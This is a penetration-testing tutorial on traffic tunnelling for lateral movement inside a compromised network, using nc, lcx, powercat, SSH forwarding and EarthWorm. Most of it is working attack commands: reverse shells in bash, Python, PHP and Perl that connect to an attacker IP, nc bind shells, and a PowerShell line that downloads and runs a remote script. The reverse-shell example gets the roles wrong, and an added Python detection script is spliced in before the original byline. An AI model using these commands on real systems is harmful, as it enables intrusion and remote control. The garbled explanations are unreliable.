• Choosing a Traffic Tunnel for Intranet Penetration

    After finishing internal network reconnaissance, a penetration tester usually has to establish how data can be sent in and carried out, that is, "gets out, gets in". Choosing a sensible, stable and reasonably secure tunnel for communication is therefore essential.

    For a definition of a communication tunnel, we can borrow the one given by the MS08067 team:

    "A tunnel is a way of communicating that bypasses port blocking. Packets on either side of a firewall are encapsulated in a packet type or port that the firewall allows, pass through the firewall, and reach the other side. When the encapsulated packet arrives at its destination it is unwrapped and the original packet is delivered to the appropriate server."

    This article is aimed at testers in the early stage of intranet lateral movement and at hobbyists who want to dig deeper. It assumes you already "have a shell on one machine inside the target's internal network" (an ordinary webshell, sqlmap's os-shell or a meterpreter shell all work in principle). In terms of penetration phases it sits after "internal reconnaissance" and before "post-exploitation": this article is about building the "skin"; if that bridge is not built properly, where will the "hair" of post-exploitation attach?

    I will cover two areas, "how to test the connectivity of each tunnel inside the internal network" and "how each tunnel is used", and explain in reasonable detail how to pick a suitable traffic tunnel for communication and data transfer during intranet penetration.

    Unless otherwise stated, the following conventions apply:

    192.168.1.11 -> attacker
    192.168.1.12 -> target
    192.168.1.13 -> intermediate (pivot) host

    I. Testing internal network connectivity

    • Commonly used tunnels:
    • ICMP

    ping baidu.com    # a reply proves both sending and receiving work
    • TCP

    nc -zv 192.168.1.3 80
    • HTTP

    curl www.baidu.com:80
    • DNS

    nslookup www.baidu.com
    dig www.baidu.com A    # Linux

    There is one more situation in which traffic cannot get out: the office network goes online through a centrally configured proxy server, so a direct connection from the host naturally cannot reach the outside. Ways to deal with it:
    1. Check whether this host has port connections to other internal machines (a proxy server)
    2. Check whether the internal network has a machine with a name like "proxy"
    3. Look directly at the proxy settings of IE or other software
    4. Confirm it from the path of the PAC file
    5. Test with curl

    curl www.baidu.com                      # fails
    curl -x proxy-ip:port www.baidu.com     # works

    II. Choosing a network tunnel

    1. Network layer

    • IPv6 (still to be researched)

    IPv6 rides on an IPv4 tunnel: the IPv6 packet is encapsulated inside an IPv4 packet and sent. When the target machine receives it, it first decapsulates the IPv4 packets (stripping the IPv4 shell around the IPv6 packet along the way) and then processes the IPv6 datagram.

    • ICMP

    2. Transport layer

    lcx port forwarding and mapping

    • Forwarding directly at the port level

    Similarities and differences:

    Port forwarding is an action, whereas a port mapping is a rule. Some of the actions in a forwarding sequence may be performed according to a mapping rule.

    lcx port mapping

    # only establishes a mapping rule
    lcx -tran 53 192.168.1.12 3389    # 192.168.1.12 is the local IP

    lcx port forwarding

    # attacker
    lcx -listen 4444 5555    # forward whatever arrives on port 4444 to port 5555 (in effect a simple mapping)

    # target
    lcx -slave 192.168.1.11 4444 127.0.0.1 3389    # forward local port 3389 to port 4444 on the attacker (192.168.1.11)

    nc

    • Data transfer over TCP/UDP

    Typical usage:

    nc 192.168.1.12 3434    # target side requests the port connection
    nc -lvp 3434            # attacker side listens on a fixed port

    Options:

    -c ""        Executes the given command via /bin/sh; runs on the given machine the command executed by the previous server, used when acting as a pivot proxy
    -d           run in the background; commonly used when setting up a backdoor
    -e           redirect a program; commonly used when setting up a backdoor
    -g gateway   set a gateway, commonly used to get around internal restrictions; up to 8
    -G num       routing hop count, a multiple of 4
    -i sec       interval between each line of data sent
    -l           put netcat in listen mode, waiting for a connection
    -L           listen mode, but when the client disconnects the server returns to waiting
    -n           use IP addresses only, no DNS resolution
    -o file      write the traffic to a file as a hex dump
    -p port      local port to listen on
    -r           randomize the ports used between local and remote host
    -s addr      source IP address for outgoing packets
    -t           answer telnet negotiation requests
    -u           use UDP mode
    -v           show error messages
    -w secs      connection timeout in seconds
    -z           disable input/output; only used when scanning
    
    Port scanning:

    nc -v 192.168.1.12 80              # probe whether port 80 is open
    nc -z -v 192.168.1.12 233-2333     # probe a port range, though it is somewhat slow

    File transfer:

    nc -lvp 8888 > 1.txt               # receiver: creates an empty 1.txt first and fills it as data arrives
    nc -vn 192.168.1.12 8888 < 1.txt   # sender

    Acting as a pivot:

    # attacker
    nc -lvp 8888

    # target
    nc -lvp 8888 -e /bin/sh

    # pivot
    nc -v 192.168.1.11 8888 -c "nc -v 192.168.1.12 8888"
    • Bind shell

    The receiving side redirects its own shell; the attacker only needs to connect.

    # target
    nc -lvp 8888 -e /bin/sh                          # Linux
    nc -lvp 8888 -e C:\Windows\system32\cmd.exe      # Windows

    # attacker
    nc 192.168.1.12 8888
    • Reverse shell

    The connecting side redirects its own shell over the connection; the receiving side only needs to listen.

    # target
    nc -lvp 8888

    # attacker
    nc 192.168.1.12 8888 -e /bin/sh

    Other ways of getting a shell

    The target machine often has no nc, so here are several ways to get a reverse shell without it.

    • Python

    # attacker: start an nc listener
    nc -lvp 8888

    # run on the target
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.11",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    • Bash

    Use Bash's [[Linux知识#0x0B 重定向符]] redirection operators to redirect a shell to the attacker

    # attacker: start an nc listener
    nc -lvp 8888

    # run on the target
    bash -i >& /dev/tcp/192.168.1.11/8888 0>&1    # -i opens an interactive bash shell
    • PHP reverse shell

    # attacker: start an nc listener
    nc -lvp 8888

    # run on the target
    php -r '$sock=fsockopen("192.168.1.11",8888);exec("/bin/sh -i <&3 >&3 2>&3");'
    • Perl

    # attacker: start an nc listener
    nc -lvp 8888

    # run on the target
    perl -e 'use Socket;$i="192.168.1.11";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh");};'

    powercat

    • powercat is essentially the PowerShell version of nc and has advantages of its own

    Getting a PowerShell back:

    # download powercat on the target
    IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.11/powercat.ps1')

    # then run
    powercat -l -p 8888 -v

    # attacker
    powercat -c 192.168.1.12 -p 8888 -v -ep

    File transfer:

    # receiver
    powercat -l -p 8888 -of 1.txt -v

    # sender
    powercat -c 192.168.1.12 -p 8888 -i C:\1.txt -v    # -i accepts either a string or a file name

    Acting as a pivot:

    # attacker
    nc 192.168.1.13 8888 -vv    # the pivot's IP goes here

    # target
    powercat -l -v -p 8888 -e cmd.exe

    # pivot
    powercat -l -v -p 8888 -r tcp:192.168.1.12:8888

    3. Application layer

    SSH

    See also: the three kinds of SSH port forwarding

    Typical usage:

    ssh root@192.168.1.1

    Options:

    -C  compress the traffic to speed up transfer
    -f  send SSH to the background so it does not occupy the current shell
    -N  silent connection (the connection is established but no session is shown)
    -g  allow remote hosts to connect to the locally forwarded ports
    -L  local port forwarding
    -R  remote port forwarding
    -D  dynamic forwarding (SOCKS proxy)
    -p  specify the SSH port

    Assume the following environment: the attacker is a VPS, the target is a database server and the pivot is a web server:


    Port forwarding:

    • Local port forwarding

    # attacker (this is a single command line); run it and you are done (it will prompt for the pivot's password)
    ssh -CfNg -L 8888:1.1.1.10:3389 root@192.168.1.11    # -L VPS port:target host:target port
    # this forwards the target ip:port given in front to local port 8888, via the pivot IP given at the end

    # confirm the connection with
    netstat -tulnp | grep "8888"

    # attacker: since the forwarded service is Remote Desktop on 3389, open it with rdesktop
    rdesktop 127.0.0.1:8888

    Local forwarding forwards the target machine's port directly to a port on the attacker.

    • Remote forwarding

    # on the pivot; unlike local forwarding, the option and the forwarding target differ
    ssh -CfNg -R 8888:1.1.1.10:3389 root@192.168.1.4    # -R VPS port:target host:target port
    # this forwards traffic arriving on port 8888 of the attacker IP given at the end to the target ip:port, so accessing local port 8888 is equivalent to accessing 3389 on the other side

    # attacker: again, since it is Remote Desktop on 3389, open it with rdesktop
    rdesktop 127.0.0.1:8888

    Remote forwarding opens a listening port on the pivot (the port is not known in advance); afterwards all traffic for the target's specific port (3389) is returned through that listening port on the pivot to the attacker's chosen port (8888).

    • Dynamic forwarding combined with SOCKS

    Compared with the single-port model of local and remote forwarding, dynamic forwarding is more powerful: the port on the destination host does not have to be fixed in advance. The port is specified locally through a protocol, and that protocol is the simple, secure and practical SOCKS protocol. Dynamic forwarding is requested with the -D option in the form -D [local host:]local port. Unlike the previous two, dynamic forwarding does not name a remote host and port; those are supplied by whatever host connects to the local port over SOCKS. Example: ssh -D 50000 user@host1 creates a SOCKS proxy, so packets sent through that proxy are forwarded out via host1.

    # attacker
    ssh -CfNg -D 8888 root@192.168.1.11

    Then set a SOCKS5 proxy of 127.0.0.1:8888 in the browser.

    At this point every IP in the internal network can be accessed from the browser.

    HTTP

    • reGeorg

    DNS

    • Internal versus external DNS resolution: an internal network can have its own domain, and if an internal name collides with a public one, resolution is governed by the internal DNS server first. It is like adding a hosts entry: if the internal DNS has its own answer, that answer is used first; if not, the public DNS server is consulted.
    • The internal server has the advantage of fast responses but can lag on updates; the public one has no update problem but is sometimes congested.

    The communication framework of a DNS tunnelling trojan is as follows:

    • Ordinary tunnels communicate directly through the compromised machine, but a DNS tunnel relays through the internal network's DNS server, with the other protocols encapsulated inside DNS for transport.

    Checking DNS connectivity

    • Make sure the target can reach the internal DNS server and that both internal and external names resolve

    cat /etc/resolv.conf | grep -v '#'    # resolv.conf is the local DNS configuration on Linux; it shows the domain and DNS IP of the current network

    # check that an internal name resolves, assuming the previous step gave the network domain subdomain.domain
    nslookup subdomain.domain    # a normal answer means connectivity

    # check that an external name resolves
    nslookup baidu.com           # a normal answer means connectivity

    dnscat2

    • Requires buying a domain; to be completed. See: PowerShell + Dnscat2 covert DNS tunnel reverse shell

    SOCKS proxy

    • Many protocols have proxy services; a proxy is powerful and can simply connect one system segment to another.
    • SOCKS listens on port 1080.

    Difference between a SOCKS proxy and an HTTP proxy:

    HTTP and HTTPS proxies work at the application layer, whereas a SOCKS proxy works at the transport layer, so it is somewhat faster than the others.

    Difference between a SOCKS proxy and a VPN:

    A SOCKS proxy only relays; the source IP seen at the destination is still your own. A VPN joins you to a private network that assigns you one of its private IPs, so the IP seen at the destination is no longer yours.

    ew

    Full name EarthWorm, project page: github.com/rootkiter/Ea

    The newer version is called Termite, project page: github.com/rootkiter/Te

    • To build a SOCKS tunnel with this tool, ew must be uploaded to the machine in question
    • Forward SOCKS5

    # target; the target must have a public IP
    ew -s ssocksd -l 8888

    # attacker
    # since the target's IP is known, connect with a proxy client such as SocksCap64 or Proxifier
    • Reverse SOCKS5

    # the target machine has no public IP
    # attacker: set up a SOCKS tunnel here, forwarding what arrives on port 1008 (the attacker's own traffic) to port 888
    ew -s rcsocks -l 1008 -e 888

    # target: also set up a SOCKS tunnel here and connect it back to the given IP and port; the tunnel is now up
    ew -s rssocks -d 192.168.1.11 -e 888

    # now connecting to port 1008 on the attacker gives access to the target's network environment
    • Two-hop network, case 1:

    The compromised intermediate host has a public IP: just set up a port forward and the attacker can connect directly. This uses the lcx_tran function.

    # target (host B): start the SOCKS tunnel
    ew -s ssocksd -l 888

    # host A (not really the attacker): start a SOCKS tunnel and forward data arriving on port 1080 to port 888
    ew -s lcx_tran -l 1080 -f 10.48.128.25 -g 888

    # 10.48.128.25 is host A's public IP; connecting to port 1080 on that IP gives access to host B's internal network
    • Two-hop network, case 2:

    The compromised intermediate host has no public IP and can only reach out to the external attacker. This uses the lcx_listen and lcx_slave functions.

    # attacker: set up the SOCKS tunnel and forward data from port 1080 to 888
    ew -s lcx_listen -l 1080 -e 888

    # target (host B): start the SOCKS tunnel
    ew -s ssocksd -l 999

    # intermediate (host A): acts as the go-between, linking the attacker's 888 with the target's 999; the SOCKS5 tunnel is now up
    ew -s lcx_slave -d 139.*.*.113 -e 888 -f 10.48.128.49 -g 999

    # connect to port 1080 on the attacker to reach host B's internal network
    • A three-hop network combines lcx_listen and lcx_slave with the reverse-connection rcsocks and rssocks; it is not covered in detail here.
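As an added example that is not part of the original article, the following Python script triages constructed process-audit records for the command shapes described above: the nc, bash, python, php and perl reverse shells, the ssh -L/-R/-D forwards, and the lcx, powercat and EarthWorm (ew) relays. The rule names, severities and sample records are my own constructions, not real telemetry or any vendor's detection content.

```python
# Added detection example: flags the reverse-shell and tunnelling command forms shown above in process records.
import os
import re
import shlex
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple

SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}


def ssh_is_tunnel(cmdline: str) -> bool:
    """True for ssh with -D, or with -L/-R plus -N or -f (a forward where no session is wanted)."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        tokens = cmdline.split()
    if not tokens or os.path.basename(tokens[0]) != "ssh":
        return False
    # Gather every single-dash option letter so bundled forms such as -CfNg are handled.
    letters = "".join(t[1:] for t in tokens[1:] if t.startswith("-") and not t.startswith("--"))
    if "D" in letters:
        return True
    return any(c in letters for c in "LR") and any(c in letters for c in "Nf")


@dataclass(frozen=True)
class Rule:
    name: str
    severity: str
    regex: Optional["re.Pattern[str]"] = None
    check: Optional[Callable[[str], bool]] = None

    def matches(self, cmdline: str) -> bool:
        if self.regex is not None and self.regex.search(cmdline):
            return True
        return self.check is not None and self.check(cmdline)


# One rule per command form from the article; patterns are kept narrow to limit false positives.
RULES: List[Rule] = [
    Rule("netcat -e/-c shell", "high",
         re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-(?:e|c)\s+\S*(?:/bin/(?:ba)?sh|cmd\.exe)")),
    Rule("bash /dev/tcp reverse shell", "high",
         re.compile(r"\bbash\b.*-i\b.*>&\s*/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    Rule("python socket/dup2 reverse shell", "high",
         re.compile(r"\bpython[23]?\b.*socket\.socket\(.*\bdup2\(.*/bin/(?:ba)?sh")),
    Rule("php fsockopen reverse shell", "high",
         re.compile(r"\bphp\b.*fsockopen\(.*exec\(.*/bin/sh")),
    Rule("perl Socket reverse shell", "high",
         re.compile(r"\bperl\b.*use Socket.*open\s*\(\s*STDIN.*exec\(")),
    Rule("EarthWorm SOCKS/port-forward", "high",
         re.compile(r"\bew\b\s+-s\s+(?:ssocksd|rcsocks|rssocks|lcx_tran|lcx_listen|lcx_slave)\b")),
    Rule("lcx port forward", "high",
         re.compile(r"\blcx(?:\.exe)?\b\s+-(?:listen|slave|tran)\b")),
    Rule("powercat execute/relay", "high",
         re.compile(r"\bpowercat\b.*\s-(?:e|ep|r)\b")),
    Rule("ssh port forwarding tunnel", "medium", check=ssh_is_tunnel),
    Rule("netcat port probe", "low",
         re.compile(r"\b(?:nc|ncat)\b\s+-[A-Za-z]*z[A-Za-z]*\s")),
]

Record = Tuple[str, int, str]  # (user, pid, command line)

# Constructed sample records (not real telemetry); the hostile lines mirror commands in the article.
SAMPLE_RECORDS: List[Record] = [
    ("www-data", 4021, "bash -i >& /dev/tcp/192.168.1.11/8888 0>&1"),
    ("www-data", 4022, "nc -lvp 8888 -e /bin/sh"),
    ("root", 4030, "ssh -CfNg -D 8888 root@192.168.1.11"),
    ("root", 4031, "ssh -p 22 deploy@192.168.1.1"),
    ("admin", 4040, "./ew -s rssocks -d 192.168.1.11 -e 888"),
    ("backup", 4050, "nc -zv 192.168.1.3 80"),
    ("jenkins", 4060, "python -c 'import json; print(json.dumps({}))'"),
    ("www-data", 4070, "php -r '$sock=fsockopen(\"192.168.1.11\",8888);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"),
]


def classify(cmdline: str) -> List[Tuple[str, str]]:
    """Return (rule name, severity) for every rule the command line matches."""
    return [(r.name, r.severity) for r in RULES if r.matches(cmdline)]


def triage(records: List[Record]) -> List[Tuple[str, str, int, List[str]]]:
    """Keep only matching records, ordered worst severity first and then by pid."""
    hits = []
    for user, pid, cmdline in records:
        found = classify(cmdline)
        if found:
            worst = min((sev for _, sev in found), key=SEVERITY_RANK.__getitem__)
            hits.append((worst, user, pid, [name for name, _ in found]))
    return sorted(hits, key=lambda h: (SEVERITY_RANK[h[0]], h[2]))
```

A record that matches several rules is ranked by its worst severity; the nc -z probe is deliberately low severity because it is also common legitimate use, while plain ssh -L without -N/-f is left unflagged to avoid paging on routine developer tunnels.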

    This article was written by Resek4 of the penetration department of 思而听网络科技有限公司; please notify us before reprinting. Readers are also welcome to join the 思而听 security team and exchange technical know-how with more experienced practitioners.
